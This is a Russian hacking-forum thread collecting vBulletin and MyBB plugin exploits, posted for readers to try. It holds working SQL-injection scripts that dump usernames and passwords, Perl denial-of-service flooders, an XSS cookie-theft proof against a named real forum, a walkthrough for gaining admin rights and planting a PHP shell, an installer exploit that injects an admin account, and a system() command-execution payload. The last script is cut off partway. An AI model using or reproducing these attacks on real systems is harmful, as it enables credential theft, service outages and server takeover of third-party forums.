1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости vbulletin

Тема в разделе "Уязвимости популярных CMS", создана пользователем rijy, 29 авг 2006.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin 3.x / 4.x / 5.x remote SQL Injection PHP exploit​


    Код:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <style>
    body {background-color: black; font-family: Verdana;  font-size: 10pt; color: #d9d9d9; margin: 30px; 30px; auto; background-attachment: fixed; background-image: url('https://lh6.googleusercontent.com/-C-Zv0fYrOtU/UJgYzWMMUiI/AAo/3UyiI7kIcQo/s600/back4.jpg'); background-repeat: no-repeat; background-position: right bottom;}
    div  { margin: 30px; 30px; auto; }
    
    </style>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title> vBulletin 3.x / 4.x  / 5.x remote SQL Injection PHP exploit [y] Cold z3ro </title>
    </head>
    <body>
    
    <form method="post"/>
    <table width="100%" border="0">
    <tr>
    <td>target</td>
    <td><input type="text" value="<? if($_POST[host]) {echo $_POST[host]; }else{echo 'http://forum.dnevno.hr/';} ?>" name="host" size="70" />
    </td>
    </tr>
    <tr>
    <td>userid</td>
    <td><input type="text" value="<? if($_POST[uid]) {echo $_POST[uid]; }else{echo '1';} ?>" name="uid" size="6" /><input type="submit" name="exp" value="Exploit-it"/></td>
    </tr>
    </table>
    </form>
    
    <div>
    
    <?php
    
    /**
    * @exploit  vBulletin 3.x/4.x/5.x ( quick_replay ) remote SQL Injection PHP exploit
    * @author  Cold z3ro
    * @site  http://www.hackteach.org , http://www.s3curi7y.com
    * @copyright   26-12-2012
    * @about it    Its depends on ajax.php file, and comments quick replay via ajax file if anabled.
    * @Note  This exploit coded for english language vBulletin forums,
    * @Note.  non english exploit will faild,you need to exploit it manually
    * @Note.  or to edit some variables depends on the fourm main language.
    * @Note.  Exploit takes time while executing.
    * @type  0day, danger  
    **/
    
    set_time_limit(0);
    ini_set('user_agent', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)');
    
    function fetchinj( $string, $str, $end ){
    $string = " ".$string;
    $ini = strpos( $string,$str );
    if ($ini == 0) return "";
    $ini += strlen( $str );
    $len = strpos( $string,$end,$ini ) - $ini;
    return substr( $string,$ini,$len );
    }
    
    function pagethis( $surl ){
    $ch = curl_init();
    curl_setopt ( $ch, CURLOPT_URL, $surl );
    curl_setopt ( $ch, CURLOPT_HEADER, 0 );
    ob_start();
    curl_exec ( $ch );
    curl_close ( $ch );
    $data = ob_get_contents();
    ob_end_clean();
    return $data;
    }
    
    if ($_POST['exp']){
    $host = $_POST['host'];
    $uid = $_POST['uid'];
    
    if( !eregi('http://', $host)){
    die('use "http://" in the link you moron');
    }else{
    
    $back = substr($host,-1,1);
    if ($back !="/"){
    $lnk = "/ajax.php";
    }else{
    $lnk = "ajax.php";
    }
    
    $lnk.= '?do=';
    $lnk.= 'quick_replay';
    $lnk.= "&t=";
    
    # checking site requirement
    $link2check   = pagethis( $host.'showthread.php?t=210' );
    $_link2check  = pagethis( $host.'showthread.php?t=400' );
    $check1 = strstr( $link2check, 'You are not logged' );
    $check2 = strstr( $link2check, 'If you followed a valid link' );
    $check3 = strstr( $_link2check, 'If you followed a valid link' );
    
    if( $check1 == true ){
    die('Exploit Faild: target need login authentication');
    }else if( $check2 == true and $check3 == true ){
    
    # make the exploit exactly and much better
    # looking for 25 $_GET[t];
    for( $i=5; $i<30; $i++ ){
    $multicheck = pagethis( $host.'showthread.php?t='.$i.'' );
    $what2check = strstr( $multicheck, 'vBulletin Message' );
    $found  = array( $what2check );
    foreach ( $found as $value => $val ){
    if ( !$val[0] )
    break 2;
    }  
    
    }
    
    }
    
    # Injecton SQL.
    $exp = '+union+select+1,2,3,';
    $exp.= 'concat(0x7a33726f31,username,0x0d0a,password,0x7a33726f32)';
    $exp.= ',5,6,username,8,9,10,11,12,13,14,15,16,17';
    $exp.= '+from+user+where+';
    $exp.= 'userid='.$uid.'--';
    
    if ( $i ){
    $exp = $host.$lnk.$i.$exp;
    }else{
    $exp = $host.$lnk.'32'.$exp;
    }
    
    $extinj = pagethis( $exp );
    $result = fetchinj( $extinj, 'z3ro1', 'z3ro2' );
    //print_r($result);
    
    if ( $result[1] ){
    echo 'Exploit fineshed :<br><br>'.$result;
    }else{
    echo 'Exploit Faild';
    }
    }
    }
    
    # Eof
    
    ?>
    </div>
    
    </body>
    </html>
    

    тот самый что продавали на 1337day.com за 500$
    проверяйте, хакиры
     
    6 дек 2012
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Код:
    # Exploit Title: Helpful Answers XSS
    # Date: September 23 2012
    # Software Version: All
    # Product Download: http://www.vbulletin.org/forum/showthread.php?t=233296
    POC:
    Код:
    helpfulanswers.php?do=topanswers&sortfield=[XSS]
    Proof:
    Код:
    http://forum.roadfly.com/helpfulanswers.php?do=topanswers&sortfield="><script>alert(document.cookie);</script>
     
    7 дек 2012
  3. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin 3.x / 4.x AjaxReg SQL Injection​

    Код:
    #!/usr/bin/php
    <?
    
    # vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
    # https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
    # livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
    # check it : http://localhost/vBulletin/clientscript/register.js
    
    function usage ()
    {
        echo
            "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
            "\n[+] Author: Cold z3ro".
            "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
            "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
            "\n[+] Usage : php 0day.php <hostname> <path> [userid] [key]".
            "\n[+] Ex.   : php 0day.php localhost /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz".
            "\n[+] Note. : Its a 0day exploit\n\n";
        exit ();
    }
     
    function check ($hostname, $path, $field, $pos, $usid, $char)
    {
        $char = ord ($char);
        $inj = 'ajax.php?do=CheckUsername&param=';
      $inj.= "admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
      $culr = $hostname.$path.$inj;
      $curl = curl_init();
      curl_setopt ($curl, CURLOPT_URL, $culr );
      curl_setopt($curl, CURLOPT_HEADER, 1);
      curl_setopt($curl, CURLOPT_VERBOSE, 0);
        ob_start();
        curl_exec ($curl);
        curl_close ($curl);
        $con = ob_get_contents();
        ob_end_clean();
      if(eregi('Invalid',$con))
          return true;
        else
            return false;
    }
     
     
    function brutechar ($hostname, $path, $field, $usid, $key)
    {
        $pos = 1;
        $chr = 0;
        while ($chr < strlen ($key))
        {
            if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
            {
                echo $key [$chr];
                $chr = -1;
                $pos++;
            }
            $chr++;
        }
    }
     
     
    if (count ($argv) != 4)
        usage ();
     
    $hostname = $argv [1];
    $path = $argv [2];
    $usid = $argv [3];
    $key = $argv [4];
    if (empty ($key))
        $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
     
    echo "[+] Username: ";
    brutechar ($hostname, $path, "username", $usid, $key);
    echo "\n[+] Password: ";
    brutechar ($hostname, $path, "password", $usid, $key);
    echo "\n[+] Done..";
    echo "\n[+] It's not fake, its real.";
    # word to 1337day.com, stop scaming me
    
    ?>
     
    12 дек 2012
  4. Waringoe
    Waringoe Новичок
    Симпатии:
    0
    Поясни пожалуйста как запускать vBulletin 3.x / 4.x AjaxReg SQL Injection
    Пробовал на дэнвере не чего не выходит, такое впечатление что это фейк какой то.
     
    14 янв 2013
  5. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    14 янв 2013
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Vbulletin xmlsitemap Page Denial of Service​


    Код:
    #!/usr/bin/perl
    #####################################
    # Vbulletin xmlsitemap Denial of Service
    #
    # Version: 4.*.*
    #
    # Code Written By Amir
    #
    # Home : Www.IrIsT.Ir - www.irist.ir/forum
    #
    # Greats : B3HZ4D - C0dex - TaK.FaNaR - Beni_Vanda - 0x0ptim0us - skote_vahshat 
    #
    # IR Anonymous - silent - Mr.epsilon - sajjad13and11 - Mr-Fardin & All Member In IrIsT.Ir
    #
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Vbulletin xmlsitemap Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Vbulletin/\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "sitemap_filename=%1%1%1%1%1%1%1%1%1%1%1%";
    $pack.= "POST " .$path. "/xmlsitemap.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "*";
     
    8 мар 2013
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection​


    Код:
    # Exploit Title: vBulletin 5 Beta XX SQLi 0day
    # Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
    # Date: 24/03/2013
    # Exploit Author: Orestis Kourides
    # Vendor Homepage: www.vbulletin.com
    # Software Link:
    # Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
    # Tested on: Linux
    # CVE : None
     
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTTP::Request::Common;
    use MIME::Base64;
    system $^O eq 'MSWin32' ? 'cls' : 'clear';
    print "
    +===================================================+
    |           vBulletin 5 Beta XX SQLi 0day           |
    |              Author: Orestis Kourides             |
    |             Web Site: www.cyitsec.net             |
    +===================================================+
    ";
      
    if (@ARGV != 5) {
        print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
        exit;
    }
      
    $host       = $ARGV[0];
    $path       = $ARGV[1];
    $username   = $ARGV[2];
    $password   = $ARGV[3];
    $magicnum   = $ARGV[4];
    $encpath    = encode_base64('http://'.$host.$path);
    print "[+] Logging\n";
    print "[+] Username: ".$username."\n";
    print "[+] Password: ".$password."\n";
    print "[+] MagicNum: ".$magicnum."\n";
    print "[+] " .$host.$path."auth/login\n";
    my $browser = LWP::UserAgent->new;
    my $cookie_jar = HTTP::Cookies->new;
    my $response = $browser->post( 'http://'.$host.$path.'auth/login',
        [
            'url' => $encpath,
            'username' => $username,
            'password' => $password,
        ],
        Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $browser->cookie_jar( $cookie_jar );
    my $browser = LWP::UserAgent->new;
    $browser->cookie_jar( $cookie_jar );
    print "[+] Requesting\n";
    my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
        [
            'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
        ],
        User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $data = $response->content;
    if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
    print "\n";
    exit 1;
     
    28 мар 2013
  8. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Vbulletin misc Page Denial of Service​


    Код:
    #!/usr/bin/perl
    #####################################
    # Vbulletin misc Page Denial of Service
    # Version: 4.*.*
    # Code Written By Amir
    # Site : Www.IrIsT.Ir - Www.IrIsT.Ir/forum - Www.IrIsT.Ir/en
    # Facebook Page : https://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
    # Greats : All Member In IrIsT.Ir
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
    print "################################################# \n";
    print "## Vbulletin misc Page Denial of Service\n";
    print "## Discoverd By Amir \n";
    print "## Www.IrIsT.Ir \n";
    print "################################################# \n";
    print "## [host] [path] \n";
    print "## host.com /Vbulletin/\n";
    print "################################################# \n";
    exit();
    }
    for($i=0; $i<99999; $i++)
    {
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
    $post = "do=getsmilies&result=%0%0%0%0%0%0%0";
    $pack.= "POST " .$path. "/misc.php HTTP/1.1\r\n";
    $pack.= "Host: " .$host. "\r\n";
    $pack.= "User-Agent: Googlebot/2.1\r\n";
    $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
    $pack.= "Content-Length: " .length($post). "\r\n\r\n";
    $pack.= $post;
    print $socket $pack;
    syswrite STDOUT, "*";
    }
     
    16 апр 2013
  9. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    ChangUonDyU - Extra File Chatbox v3.6.0 Multiple vulnerabilities​


    Код:
    # Exploit Title: Multiple vulnerabilities in ChangUonDyU - Extra File Chatbox 
    # Date: 03.02.2013
    # Author: Inquiry from http://crackhackforum.com
    # Vendor or Software Link: http://community.mybb.com/thread-63559.html
    # Software Link: community.mybb.com/attachment.php?aid=17079
    # Version: Affected are all versions up to 3.6.2
    # Google Keywords: 
    # Tested on: Opera 12.15 & FireFox 21
    ##Greetings to all http://crackhackforum.com members.##
     
    ########################################################################################
    [Introduction]
    ChangUonDyU - Extra File Chatbox is a MyBB plugin used for live chatting with other users on the forum. The developer was probably quite lazy(no offense) because of the high amount of vulnerabilities in the plugin. With a short look there exists several persistent Cross Site Scripting vulnerabilities, Code Execution and Authentication Vulnerability. Despite the XSS and Code Execution are the most dangerous in the list, Authentication vulnerability makes it all possible to happen. The impact of the vulnerability is very dangerous and combining all these could lead to defacing. To be exact it's possible to upload a shell to the target server and with just being a regular user. The concept is actually easy, A regular member is able to register the forum and use the shoutbox. As there is a 'small' Authentication vulnerability the regular member with no permissions at all is able to gain Administrator privileges to perform the actions any person with real privileges is able to. Yet with having Administrator privileges it's possible to trigger several XSS's and Code Execution. With persistent XSS we're able to steal the Security tokens of Administrator to perform CSRF & with Code Execution we're able to execute our shell on the targets system. 
     
    [0x01 XSS]
    Actually there's no XSS protection at all and all the forms are vulnerable to it. The ones which are appearing the most are with the 'Ban User' command and 'Notice' command. In this example I'll tell you the XSS with the Ban command because we'll upload the shell with the /notice command.
    Banning works by entering a banning command which states the user ID and banning reason as such : /ban 1(bans the person with ID 1 in the forum) Advertising(The reason which goes to the logs to review incase you'd like to unban). By removing the banning reason with the XSS payload, it'll be executed.
     
    Example : Original & XSS banning commands which will ban the person with User ID 1 which is mostly Administrator
    Original : /ban 1 advertising 
    Malicious : /ban 1 <script>alert('1')</script>
     
    Note: XSS won't disappear after unbanning the user, no matter if you're even re-banning him several times. As the messge goes to the Archive of the shoutbox, it'll leave only after using the /prune command to clear the chatbox & it's archive.
    The questions remains, how we're able to use it because only administrators and Staffs/Moderators are able to ban. There's also a solution to this, if you read the above then you know that there's also a Authentication vulnerability which allows us to gain the rights. Scroll down the page to find out how although I suggest to keep reading.
     
    Proof of Concept : 
    function build_ban($shout)
    {
            global $config,$phrase;
            $text = "ban > $shout[userid] > $shout[username] > $shout[dateline] > <span class='smallfont'>#<b>$shout[username]</b> ";
            if (!empty($shout['banusername']))
            {
                    $text .= "$phrase[banned_name] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banusername]</a>";
            }
            else
            {
                    $text .= "$phrase[banned] <a href='http://{$config['cbforumlink']}/member.php?action=profile&uid=$shout[banuserid]' target='_blank'>$shout[banuserid]</a>";
            }
            if ($shout['reason']) $text .= ". <i>$phrase[reason]: $shout[reason].</i>";
            $text .= '#</span>';
            return $text;
    }
     
    [0x02 Code Execution]
    Like I told above there are several vulnerabilities and alot of XSS's and almost all the forms in the chatbox's Cpanel aren't having any kind of protection. So doesn't have the /notice page it either. It's actually quite easy to trigger the XSS in there because we just have to insert our payload as a Notice, but as I said there's no protection which gives us an oppornutunity for Code Execution. You're almost all smart enough in here I assume that you know what that means, but I'll go through it with a sentence to make it clear to everyone. With entering XSS payload as the notice such as <script>alert('1')</script> it'll be executed. Yet we can replace the XSS payload with the code we'd like and that code could be a PHP shell and it'll be executed on the server and gives us access to it. Yet again we don't have any permissions to trigger the Code Execution, but read below because there's the solution. The downside of this is that you can access the shell through the shoutbox and that's obvious as we executed the shell through the shoutbox's notice. You can use any of these 404:forbidden shells because that'll give you some extra time yet that's enough to make another backdoor and put the shoutbox working again although it works, just the notice will appear as a 404:forbidden. 
     
    Proof of Concept : 
    function build_notice()
    {
            global $fcbfile,$smilies;
            $noticef = file_get_contents($fcbfile['notice']);
            $handle = fopen($fcbfile['ds_notice'],"w");
            if ($noticef)
            {
                    $noticef = BBCode($noticef);
                    $noticef = strtr($noticef, $smilies);
            }
            fwrite($handle, $noticef);
            fclose($handle);
    }
     
    [0x03 Authentication Vulnerability]
    That's probably the most interesting finding in the whole package, atleast it is in my sight and that's the point which makes the two above & one below possible. When I was looking for various security risks in the plugin I also opened up HTTP live header which is a popular FireFox addon for viewing the HTTP traffic going by. With chatting to myself in the WAMP I also took a look at the HTTP headers and noticed that the HTTP requests for posting a message in the shoutbox and it looked as following : 
     
    Explained : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=[SSID]&userid=1000&groupid=1&username=<span style="color: [The color of the username];"><strong>[Name]</strong></span>&message=[Message]
    Real request : http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=2&groupid=1&username=<span style="color: #5EFF00;"><strong>Inquiry</strong></span>&message=Inquiry
     
    That made me think how did the developer managed to verify that the request is coming from a legitimate user. By seeing the previous work of the developer I were sure that I'm also able to find something out of there because verifying or locking the permissions would be quite hard for him. With few minutes I thought how he most likely organized the "who has permissions to use commands" list and I thought that probably by gving them to the persons who're having the group ID of Administrators and Moderators/Staffs. And that's the point where I were quite sure that there probably even isn't any kind of protection. I decided to try my luck on that one and replaced the original request with this : 
     
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=Admin
     Like you can see I've changed some details with the original request. Actually almost all the data except the Security Token which protects against CSRF. I have changed the "UserID" from 2 to 1, "GroupID" from 1 to 4, "Color:" from #5EFF00 to #FF0000 and "Username" from Inquiry to Crackhackforum. Then let's give it a shot and load the request. After proccessing the request, there should appear a new message in the shoutbox. Yet now the username doesn't appear as yours, but as a Administrators. Your User ID doesn't show up as yours, but as Administrator's. And by the way how the developer gives permission of the shoutbox, by the group ID, you also have that one as Administrator as GroupID=4 belongs to Administrators. Also the username will look red like it is in most of MyBB forums. The best thing about is that you really are looking as a legitimate username and even another Administrator can't make sure that you're the wrong one. The conclusion we can make from here is that you're now a LEGIT administrator of the shoutbox and absolutely nobody can't claim otherwise. That's fun to play a Administrator on a random forum indeed, but we're still trying to make some more progress and go further. Like we know, we're being shown as Administrators and with the Administrator place there comes permissions to ban, prune & give new notices and alot more. That's how we're trying to make some progress. 
     Now we'll test is our hint correct and are we able to use the Administrator's privileges. For that we'll just use a simple pruning command to see if it takes affect and if it does then it means we're successful. The pruning command would look as such then : 
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/prune
      
     It worked and the shoutbox is being pruned by an Administrator which in this case are us. Now here are coming in the two previous findings above. First I'll show you how to use the banning command to perform XSS attack and as we're in the forum it might cause everything that XSS causes, but you can even create a small XSS worm with it in the forum. 
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/ban 1000 [XSS payload]
     As we already know that we're Administrators with legit privileges it isn't a surprise for us that also that one works and the XSS will be executed. The second thing is adding the new notice which goes mainly through the chatbox's Cpanel where we don't have access, but it's also possible to update the notice through the shoutbox with a simple command which I'll show you. 
      
     http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span>&message=/notice [<?php PHP shell goes here ?>]
     
     After proccessing this code it'll be executed and you have your shell on the server which will give you permission to the whole database to do whatever you'd like. 
    Note*: You have to click the link(e.g posting it to the shoutbox and then clicking it) or otherwise the request won't be processed.
    Note*: You have to either decode the URL or remove the spaces. It's because you have to click the link, but if there are spaces then the URL will be read to the first space. 
    Note*: Your shoutbox might use the colors name instead of HEX values. It depends on the shoutbox you're using. 
     Proof of Concept : 
     ##### POST SHOUT #######
    if ($_REQUEST['do'] == 'postshout')
    {
            $managegroup = explode(",", $config['managegroup']);
            $shout = $_REQUEST;
             
            if ($config['check_domain_reffer'] AND !checkpost($config['forumlink'] , $_SERVER['HTTP_REFERER']))
            {
                    echo $phrase['accessdenied'];
                    exit;
            }
             
            $request_ip = $_SERVER['REMOTE_ADDR'];
             
            if ($config['strip_slash'])
            {
                    $shout['username'] = stripslashes($shout['username']);
                    $shout['message'] = stripslashes($shout['message']);
            }
             
            if ($config['check_chatbox_key'] AND !check_chatbox_key($shout['key'], $shout['userid'], $shout['username'], $shout['groupid']))
            {
                    echo $phrase['accessdenied'];
                    exit;
            }
             
            $banneds = unserialize(file_get_contents($fcbfile['ds_banned']));
     
            $cancommand = false;
            if (in_array($shout['groupid'], $managegroup))
            {
                    $cancommand = true;
            }
             
            if ($shout['message'] && $shout['userid'])
            {
                    // CHECK BANNED USER
                    if (isset($banneds[$shout['userid']]))
                    {
                            echo $phrase['bannotice'];
                            exit;
                    }
      
     [0x04 XSS & HTML injection on the HTTP request]
     That's probably the same dangerous as the first XSS and comparing it to those vulnerabilities above it's basically nothing. Yet if I wouldn't find the other ones then it would be a critical one and I think it's worth to be mentioned. It's kinda related to the above vulnerability which means the /index.php?do=postshout can be exploited in several ways. Again, comparing to the above vulnerabilities it's kinda useless although maybe the Administrator blocks the other vulnerabilities and then it could work out. I think that expalaining of this doesn't need any further sentences because you can understand it from the link : 
      
      http://host.ltd/[path]/chatbox/index.php?do=postshout&key=94762112822fa6da1c8be7c0b8aff852&userid=1&groupid=4&username=<span style="color: #FF0000;"><strong>CrackHackForum</strong></span><Here goes HTML or XSS>&message=CrackHackForum
      
     Proof of Concept : The same as it's with the 0x03
     ##Greetings to all http://crackhackforum.com members and specially to BaseHack Network crew members Thallium, DES and Vash.##
     
    # 700E38F66557523E   1337day.com [2013-04-30]   49F1383FFBD3B9F7 #
     
    30 апр 2013
  10. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    тот самый)

    vBulletin 4.1.x and 5.x.x 0day Exploit released by 1337 Hacker
    Код:
    <html xmlns="http://www.w3.org/1999/xhtml"><head> 
     
     
     
     
     
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
     
    <title>vBulletin 0day</title> 
     
    <style type="text/css"> 
     
    <!--
     
    body {
     
        background-color: #000;
     
        text-align: center;
     
        color: #063;
     
        font-size: large;
     
    }
     
    .a {    font-size: 24px;
     
    }
     
    .f {    color: #060;
     
    }
     
    .gbf {    color: #F00;
     
    }
     
    .dd {
     
        color: #F00;
     
    }
     
    .w {
     
        font-size: large;
     
    }
     
    a:link {
     
        text-decoration: none;
     
    }
     
    a:visited {
     
        text-decoration: none;
     
    }
     
    a:hover {
     
        text-decoration: none;
     
    }
     
    a:active {
     
        text-decoration: none;
     
    }
     
    -->
     
    </style></head><body> 
     
    <p class="a">
    
     
    <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1> 
     
    <br>Created by: 1337
    <br>Found on: 08/22/2013
    <br>Website: http://www.madleets.com
    </p> 
    
    <br>
    <?php
    //extract data from the post
    if(isset($_POST['submit'])){
    extract($_POST);
    //set POST variables
    $url = $_POST['url'];
    $fields = array(
                            'ajax' => urlencode('1'),
                            'version' => urlencode('install'),
                            'checktable' => urlencode('false'),
                            'firstrun' => urlencode('false'),
                            'step' => urlencode('7'),
                            'startat' => urlencode('0'),
                            'only' => urlencode('false'),
                            'customerid' => urlencode($_POST['customerid']),
                            'options[skiptemplatemerge]' => urlencode('0'),
                            'response' => urlencode('yes'),
                            'htmlsubmit' => urlencode('1'),
                            'htmldata[username]' => urlencode($_POST['username']),
                            'htmldata[password]' => urlencode($_POST['password']),
                            'htmldata[confirmpassword]' => urlencode($_POST['password']),
                            'htmldata' => urlencode($_POST['email'])
                    );
    //url-ify the data for the POST
    foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
    rtrim($fields_string, '&');
    //open connection
    $ch = curl_init();
    //set the url, number of POST vars, POST data
    curl_setopt($ch,CURLOPT_URL, $url);
    curl_setopt($ch,CURLOPT_POST, count($fields));
    curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
    curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
    curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
    //execute post
    $result = curl_exec($ch);
    //close connection
    curl_close($ch);
    exit();
    }
    ?>
    <center>
    <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
    <span>Example:http://test.com/forum/install/upgrade.php</span><br>
      <span>Website:</span>
        <input name="url" type="text" tabindex="1" size="60" />
        <br>
        <span>Customer ID:</span>
        <input name="customerid" type="text" tabindex="2" size="40" />
        <br>
        <span>Username:</span>
        <input name="username" type="text" tabindex="3" size="40" />
        <br>
        <span>Password:</span>
        <input name="password" type="text" tabindex="4" size="40" />
        <br>
        <span>Email:</span>
        <input name="email" type="text" tabindex="5" maxlength="40" />
        
    <input name="submit" type="submit" value="Inject Admin">
    </form>
    </center>
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p> 
     
    <p class="a">------------------------------------------------------------------------------------------------------------------</p> 
     
    
    </div>
            
     </pre> 
     
    <p class="a">&nbsp;</p> 
    <p align="center"> 
     
    
      </body></html>[/CODE]
     
    11 окт 2013
  11. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Vbulletin Command Execution Exploit / Shell Upload

    p0c:

    Код:
    search.php?ajax=0&beforeafter=after&childforums=1& exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless= 0&replylimit=0&saveprefs=1&searchdate=0&searchth re adid=0&searchtype=1&searchuser=1&showposts=0&sortb y=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
    
    
    "query" param

    Код:
    inject : ${@system('put command here')}
     
    11 дек 2013
  12. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    vBulletin Tapatalk - Blind SQL Injection​


    Код:
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, urllib
    import xmlrpclib,re, urllib2,string,itertools,time
    from distutils.version import LooseVersion
    
    
    class Exploit(object):
    def __init__(self, target, debug=0 ):
    self.stopwatch_start=time.time()
    self.target = target
    self.path = target
    self.debug=debug
    if not self.target.endswith("mobiquo.php"):
    self.path = self.detect_tapatalk()
    if not self.path:
    raise Exception("Could not detect tapatalk or version not supported!")
    self.rpc_connect()
    self.attack_func = self.attack_2
    
    def detect_tapatalk(self):
    # request page, check for tapatalk banner
    handlers = [
    urllib2.HTTPHandler(debuglevel=self.debug),
    urllib2.HTTPSHandler(debuglevel=self.debug),
    
    ]
    ua = urllib2.build_opener(*handlers)
    ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
    data = ua.open(self.target).read()
    if self.debug:
    print data
    if not "tapatalkDetect()" in data:
    print "[xx] could not detect tapatalk. bye..."
    return None
    
    # extract tapatalk version
    print "[ i] Taptalk detected ... ",
    path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
    path+="mobiquo.php"
    print "'%s' ... "%path,
    data = urllib.urlopen(path).read()
    version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
